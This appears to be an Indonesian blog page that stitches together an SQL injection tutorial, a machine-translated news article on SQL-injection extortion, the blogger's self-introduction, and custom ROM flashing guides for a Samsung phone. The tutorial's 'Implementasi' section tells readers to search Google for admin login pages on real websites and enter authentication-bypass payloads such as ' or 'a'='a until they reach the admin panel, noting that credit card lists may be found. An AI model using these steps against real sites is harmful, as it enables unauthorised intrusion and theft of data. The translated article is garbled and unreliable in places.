TUTORIAL SQL INJECTION

Pengertian SQL Injection
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.
SQL Injection merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Sebab terjadinya SQL Injection
Tidak adanya penanganan terhadap karakter  karakter tanda petik satu  dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.

Bug SQL Injection berbahaya ?
Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan datadata yang berada didalam database.
Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.

Apa saja yang diperlukan untuk melakukan SQL Injection ?
Internet Exploler / Browser
PC yang terhubung internet
Program atau software seperti softice

Contoh sintaks SQL Injection
Contoh sintak SQL dalam PHP
$SQL = select * from login where username =$username and password = $password; , {dari GET atau POST variable }
isikan password dengan string  or  =
hasilnya maka SQL akan seperti ini = select   * from login where username = $username and password=pass or =′”; , { dengan SQL ini hasil selection akan selalu TRUE }
maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL

Gambar contoh SQL Injection

Contoh sintaks SQL Injection
Sintaks SQL string ‘-- setelah nama username
Query database awal :

Berubah menjadi :

Contoh sintaks SQL Injection
SQL Injection melalui URL, contohnya :

Penanganan SQL Injection
Merubah script php
Menggunakan MySQL_escape_string
Pemfilteran karakter  dengan  memodifikasi php.ini

1. Merubah script php
Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));

Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter  or  =  kedalam form email dan password maka akan terbentuk query sebagai berikut :

Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));
2. Menggunakan MySQL_escape_string
Merubah string yang mengandung karakter  menjadi \ misal SQL injection menjadi SQL injec\tion
Contoh :  $kar = SQL injection;
$filter = mySQL_escape_string($kar);
echoHasil filter : $filter;
Hasilnya :

3. Pemfilteran karakter  dengan memodifikasi php.ini
Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter  diubah menjadi \ secara otomatis oleh php
Contoh :

Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true  for i = 1 to len( input )
c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function
Implementasi SQL Injection
Masuk ke google atau browse yg lain
Masukkan salah satu keyword berikut
"/admin.asp"  "/login.asp"  "/logon.asp"  "/adminlogin.asp"  "/adminlogon.asp"  "/admin_login.asp"  "/admin_logon.asp"  "/admin/admin.asp"  "/admin/login.asp"  "/admin/logon.asp"  {anda bisa menambahi sendiri sesuai keinginan anda}

Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
Masukkan kode berikut :
User name : ` or `a'='a  Password : ` or `a'='a (termasuk tanda petiknya)
Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about,  dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
Banyak variasi kode yang mungkin, antara lain :
User name : admin  Password : ` or `a'='a  atau bisa dimasukkan ke duaduanya misal :
or 0=0 --  ;   or 0=0 -- ;  or 0=0 -- ;   or 0=0 # ;
  or 0=0 # ;   orx=x ;   or x=x  ;  ) or (x=x
Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.

Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.

R E F E R E N S I
-------------, SQLinjection, (www.BlackAngels.it).
-------------, Advanced SQL injection in SQL server applications, (www.ngssoftware.com).
-------------, SQL injection walktrough (www.securiteam.com).
BM-100, Hacking hiltonjakarta.com (SQL Injection), 24 Juli 2005,  (http://www.jasakom.com).
Budi Raharjo, ”Keamanan Sistem Informasi Berbasis Internet, PT Insan Indonesia & PT INDOCISC, Jakarta,2002.

Tutorial lengkap >> https://drive.google.com/file/d/0B-x5uaTqoYNlUTI5MzdoVmRuU1k/view?usp=drivesdk

Kurangnya program bug bounty tidak akan menghalangi serangan pemerasan dunia maya ( Lack of bug bounty programs won't deter cyber extortion attacks )

oleh
Peter Loshin

Editor situs

Diterbitkan: 2 Juni 2016

Seorang peneliti keamanan telah melaporkan kampanye yang tidak biasa dari serangan cyber terhadap 30 perusahaan selama tahun lalu di mana data sensitif atau pribadi yang diposting ke server cloud dan diikuti oleh email dari penyerang yang meminta pembayaran dalam pertukaran untuk mengungkapkan bagaimana data tersebut diambil.

Rangkaian serangan pemerasan maya ditemukan oleh seorang peneliti keamanan di IBM yang dijuluki serangan "bug perburuan" karena kemiripan dengan transaksi yang dilakukan melalui program karunia bug, di mana perusahaan menawarkan pembayaran kepada peneliti yang melaporkan kelemahan atau kerentanan dalam infrastruktur jaringan organisasi atau produk.

"Sangat penting untuk dicatat bahwa ini tidak kasus di mana organisasi korban telah mensponsori karunia bug programthat memungkinkan kegiatan ini," tulis John Kuhn, peneliti ancaman senior di IBM Managed Security Services yang menemukan kampanye. "Ini semua dilakukan di bawah penyamaran berpura-pura menjadi orang baik ketika, pada kenyataannya, itu adalah pemerasan murni pada skala topi hitam. Serangan ini dilakukan oleh penjahat berpura-pura ingin melakukan sesuatu yang baik bagi organisasi tetapi menuntut pembayaran untuk melakukannya. "

Aspek paling menarik dari ini, Kuhn mengatakan, adalah "daerah abu-abu moral" bahwa penyerang beroperasi di.

"Mereka adalah topi hitam, karena mereka melakukan mengeksploitasi perusahaan ini dan mereka melakukan kebocoran data mereka dan diposting secara online. Ini akan menjadi perilaku kriminal oleh hukum. Tapi mereka mengatakan, 'kami akan melindungi data ini, jika Anda hanya memberikan kita uang. ' Dan itu pemerasan, "kata Kuhn SearchSecurity. "Mereka etis bisa mengungkapkan kerentanan ini untuk perusahaan jika mereka benar-benar ingin membantu mereka. Mereka bisa melakukannya tanpa meminta tebusan, maka sementara ini mungkin 'abu-abu-ish' daerah, bagi saya, itu hanya pemerasan."

Rincian serangan, korban

Sambil mengingatkan bahwa ia tidak bisa memberikan spesifik dari serangan cyber pemerasan atau korban, Kuhn melakukan memberitahu SearchSecurity bahwa dalam "yang kami menyadari, tebusan adalah $ 30.000 dalam setiap kasus. Mereka tampaknya akan menjalankan pemerasan flat-fee. "

"Kami menyadari satu perusahaan yang melakukan [membayar]," kata Kuhn, dan dalam hal bahwa penyerang "tidak mengikuti kata-kata mereka, mereka melakukan mengungkapkan kerentanan terhadap perusahaan itu."

penjahat ini mengklaim mereka melakukan layanan untuk organisasi ini, tapi benar-benar ini adalah lurus ke atas manajer intelijen extortion.Karl Siglerthreat, Trustwave

"Tidak ada kesamaan yang nyata antara semua korban, selain itu kebanyakan dari mereka memiliki mudah eksploitasi injeksi SQL," Kuhn mengatakan, yang mungkin berarti bahwa penyerang "sedang mencari hal-hal yang mudah untuk mengeksploitasi dan menarik pemerasan ini dengan cepat dan lebih efisien . "

Kuhn tidak mengesampingkan kemungkinan bahwa penyerang menggunakan kerentanan lainnya. "Saya tidak tahu secara spesifik ke-30 [serangan], saya tahu secara spesifik dari beberapa, dan mereka adalah suntikan SQL, tapi aku harus membayangkan mereka tidak semua suntikan SQL."

Kuhn tidak akan berspekulasi tentang identitas para penyerang. "IBM tidak pernah turun rantai atribusi. Saya mengerti bagaimana serangan itu terjadi dan bagaimana hal itu diatur dan banyak spesifikasi itu, tapi kami tidak pernah mencoba untuk mencari tahu apakah itu satu orang atau kelompok. Kami meninggalkan ke penegak hukum . "

Apakah itu benar-benar baru?

"Ini bukan strategi baru," kata Kuhn. "Tapi itu bukan sesuatu yang banyak orang berbicara tentang, dan itu tidak terjadi yang sering." Kuhn mengatakan bahwa, sebelumnya ke 30 serangan yang terjadi dalam tahun lalu, "aku bisa menghitung mungkin satu atau dua yang saya dengar dari dalam 14 tahun sebelumnya. Ini secara signifikan meningkat, dan semakin bahwa hal itu terjadi, dan lebih banyak orang yang membayar tebusan tersebut, yang lebih populer teknik ini akan menjadi. aku hanya bisa melihatnya mendapatkan lebih canggih. sekarang, mereka akan setelah buah tergantung rendah, suntikan SQL mudah. ​​"

"Saya pasti berpikir bahwa jenis kegiatan akan meningkat, itu sebabnya saya memutuskan untuk berbicara tentang hal itu," kata Kuhn. "Aku harus setidaknya membuat perusahaan menyadari bahwa ini mungkin terjadi pada mereka, dan mendapatkan beberapa kesadaran akan sehingga orang dapat mulai membangun rencana respon sekitarnya, dan memahami bagaimana tepatnya mereka akan menangani situasi ini jika terjadi pada mereka."

Karl Sigler, ancaman manager intelijen di Trustwave, mengatakan: "Jenis ini cerita setua peretasan Kembali bahkan untuk tahun 1990 Anda akan menemukan kisah-kisah hacker menuntut pembayaran untuk mengungkap beberapa bug kritis mereka 'ditemukan' dalam infrastruktur organisasi. . penjahat ini mengklaim mereka melakukan layanan untuk organisasi ini, tapi benar-benar ini adalah lurus ke atas pemerasan. "

Lysa Myers, peneliti keamanan di ESET, setuju bahwa sementara istilah "bug perburuan" baru, konsep pemerasan cyber tidak. "Risikonya adalah karena selalu [bahwa] jika keamanan Anda adalah lemah, hal-hal buruk dapat dan mungkin akan terjadi. Sangat penting untuk software Anda tetap up to date, dan data sensitif Anda dienkripsi saat istirahat dan dalam perjalanan. Ada banyak cara untuk membuat sistem anda target tidak menarik bagi para penjahat sehingga mereka akan bergerak sepanjang ke target berikutnya. "

"[W] e melihat jenis serangan terhadap server web setiap hari. Ini adalah contoh lain dari lawan memanfaatkan serangan yang tidak bergantung pada malware," kata Dan Larson, direktur manajemen produk teknis di CrowdStrike, menambahkan bahwa dengan endpoint yang modern produk keamanan adalah mungkin untuk "mengidentifikasi dan mencegah serangan semacam ini dengan melihat perilaku penyerang. dalam kasus ini, perilaku ini biasanya serangan injeksi SQL diikuti oleh penyerang menjatuhkan shell web."

Apa yang harus dilakukan tentang hal itu?

Kuhn menyarankan korban bug perburuan untuk memulai dengan mengumpulkan semua informasi yang tersedia tentang serangan dunia maya pemerasan, termasuk email dari para penyerang serta server log, dan kemudian menghubungi "penegak hukum setempat, FBI atau Interpol."

Peter Loshin bertanya:

Bagaimana organisasi Anda akan menanggapi bug perburuan serangan maya pemerasan?

Kuhn menulis: "Ada banyak perdebatan mengenai apakah sebuah organisasi maka harus membayar tebusan Sementara dalam kasus ini ada indikasi bahwa penyerang dapat memberikan rincian dari kerentanan setelah pembayaran, salah satu bisa berpendapat bahwa mungkin tidak selalu menjadi kasus. . organisasi akan berkontribusi terhadap cybercrime. "

Kuhn menulis bahwa "fakta bahwa organisasi memiliki sejarah membayar tebusan mungkin memberanikan masalah masa depan," menambahkan bahwa "sebuah perusahaan dengan postur keamanan perusahaan tidak perlu membayar tebusan sama sekali. Investigasi forensik dari serangan itu dan metodologi yang bisa mudah mengidentifikasi mengeksploitasi digunakan tanpa membayar penyerang. "

Adapun pencegahan, Kuhn merekomendasikan menjalankan scan kerentanan dari setiap server menghadap ke luar, menjalankan tes penetrasi, menggunakan IPS dan aplikasi web firewall, pengujian dan audit kode aplikasi web sebelum dinyalakan, dan menggunakan SIEM untuk memantau dan log mengalir jaringan data. Dia juga mengatakan: "Ini kunci untuk memiliki dan memelihara rencana insiden respon jika Anda menghadapi ancaman serupa Memastikan organisasi Anda tahu siapa yang harus dihubungi dan bagaimana menanggapi di muka sangat penting untuk respon yang efektif dan mitigasi.."

"Ini tidak mengherankan bahwa para penjahat tertentu terutama mengandalkan SQL injection untuk exfiltrate data yang digunakan untuk pemerasan," kata Sigler, menambahkan bahwa SQL injection adalah salah satu kelemahan yang paling umum perusahaannya menemukan selama aplikasi web audit dan penetrasi tes. "Bisnis harus melakukan penilaian kerentanan yang sedang berlangsung dan uji penetrasi dari setiap layanan yang dihadapi masyarakat. Mempekerjakan firewall aplikasi web di depan server web Anda juga akan membantu mencegah serangan jenis ini. Akhirnya, monitoring server log web Anda dan aktivitas jaringan dapat membantu Anda tempat pelanggaran sebelum kerusakan besar bisa dilakukan. "

sumber : http://searchsecurity.techtarget.com/news/450297703/Lack-of-bug-bounty-programs-wont-deter-cyber-extortion-attacks

Oke pertama-tama saya akan memperkenalkan diri.

Nama : Hilfan Nofyansyah
TTL : Bandung, 18-11-1999
Alamat : Padalarang, kab.Bandung Barat, Jawan Barat Indonesia
Sekolah : Smk Negeri 4 Padalarang (X TKJ B)

Selanjutnya saya akan menjelaskan mengenenai blog ini.
Tujuan pembuatan blog ini adalah untuk memudahkan orang mencari suatu keahlian tentang oprekers. Diblog ini sudah tersedia berbagai macam aplikasi, cusrom, tutorial, dll. Tapi diblog ini masih ada sebagian copasan dari orang lain, karena saya dari pembuat blog ini masih kekurangan fasilitas pc/laptop jadi mau tidak mau saya harus bermodal ke warnet untuk membuat blog ini.

Cukup sekian deskripsi tentang blog saya, semoga blog ini semakin maju kedepannya *amiinn

Thanks To :
Allah SWT
Mastah Oprekers
Me
Papa dan Mama
Kalian

[ROM] ZIEREX EVOLUTION [UPDATE v1.6 FIX BUG] [GALAXY YOUNG GT-S5360] [UPDATED v1.7]

Posted by Baskom Spot on Minggu, 20 April 2014

• StatusBar with Flyme Style
• 15 Toggle
• UI Support EDT Tweaks
• 3 Layout on UI
• Slider Brighness on UI
• Speed Meter / Data Trafic on UI
• Toggle Music Control
• Owner Profile
• Multi LockScreen
• 50% Transparent
• Screenizoid on Setting
• Sytem Apps Intaller and Remover on Setting
• YouTube Support Download
• Widget Analog Clock with GalaxyYTrick Style
• MMS Bubble
• Galaxy Y S3 Bootanimation Style
• Support Arabic Font
• Music App with Vanila Music
• Megabass CM7 Basic
• Zierex Wallpaper

• Download rom terlebih dahulu
• Simpan di luar sd card
• Matikan HH kalian dan masuk recovery mode dalam keadaan mati [tekan tombol home + power + volume up bersamaan selama beberapa detik]
• Lalu pilih apply update from sd card
• Pilih CWM YOUNG
• Lalu Wipe data and cache.
• Lalu pilih Mount and Storage
• Mount semua [yang tulisannya mount ubah jadi unmount]
• Klik back
• Lalu pilih install zip from sd
• Lalu choose zip from sd
• Pilih ZIEREX-EVO
• Reboot system now dan tunggu 2-5 menit

Cara Install :

• Download update
• Simpan di luar sd card
• Ke recovery mode
• Install CWM
• Install ZierexEvoUpdatev1.2

Link Update V1.2

Screenshot :

• SystemUI with 8 Layout
• Looks elegant SystemUI

• Multi Language
• 10 Lockscreen
• Chainfire 3D
• New TouchWiz30Launcher with 4x5 Drawer
• Statusbar Background (Expandad) Changer

• 4 Layout Expanded
• DCSMS Dummy Support
• Tablet Tweak
• Soft Button

• Flashlight
• USB Storage

Tutorial – Custom ROM Hyperion 8 untuk Galaxy Young

Persiapan dan Cara Instal

1. Temporary CWM, Download » Klik Disini «
   
2. HYPERION-08.GM-RIL.FIX.zip, Download » Klik Disini «
   
3. ROM HYPERION-08.GM-FINAL.zip, Download » Klik Disini «
   yang masih bingung, setelah masuk ke web download klik gambar yang saya kasih panah
   

1. Copy ketiga file tersebut, ke root sdcard menggunakan kabel data di komputer atau laptop.
2. Matikan Galaxy Y anda lalu Tekan Power + Volume Up + Home secara bersamaan, sampai muncul boot samsung galaxy y gt-s5360, lalu lepaskan.
3. Maka Smartphone anda masuk ke mode Android System Recovery.
4. Lalu Pilih apply update from sdcard, Cari file TempCWM.zip.
5. Pada mode ClockworkMod Recovery (CWM). Pilih mounts and storage, Mount /system, /data, cache (terlihat unmount).
6. Tekan tombol power atau tombol back. Pilih advanced » Pilih wipe dalvik cache and wipe batterystats.bin (optional).
7. Tekan tombol power atau tombol back. Pilih wipe data/factory reset » Pilih wipe cache partition.
8. Pilih install zip from sd card.Pilih choose zip from sd card. Cari file Hyperion zip package (HYPERION-08.GM-FINAL.zip).
9. Tekan tombol power atau tombol back » Pilih mounts and storage » Mount /system, /data, cache (terlihat unmount).
10. Tekan tombol power atau tombol back » Pilih install zip from sd card » Pilih choose zip from sd card. » Cari file RIL Fix package (HYPERION-08.GM-RIL.FIX.zip).
11. Tekan tombol power atau tombol back. »Setelah selesai, reboot system now (Pertama reebot memang agak lama)